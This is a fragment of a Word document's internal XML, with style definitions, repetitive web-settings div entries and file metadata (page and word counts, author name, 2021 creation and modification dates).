    <w:rsid w:val="00EF3F75"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A6211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27812">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="368187943">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="457340515">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="915284575">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="916941360">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="976451631">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1033574807">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1066296168">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1619795441">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1769153626">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1774088605">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="191119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56BC6-1F80-4D9D-A796-7CC20768D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77</Pages>
  <Words>16611</Words>
  <Characters>94684</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>789</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Kashfun Nazir</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kashfun Nazir</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <cp:lastPrinted>2021-05-05T12:47:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-05T12:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-05T12:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>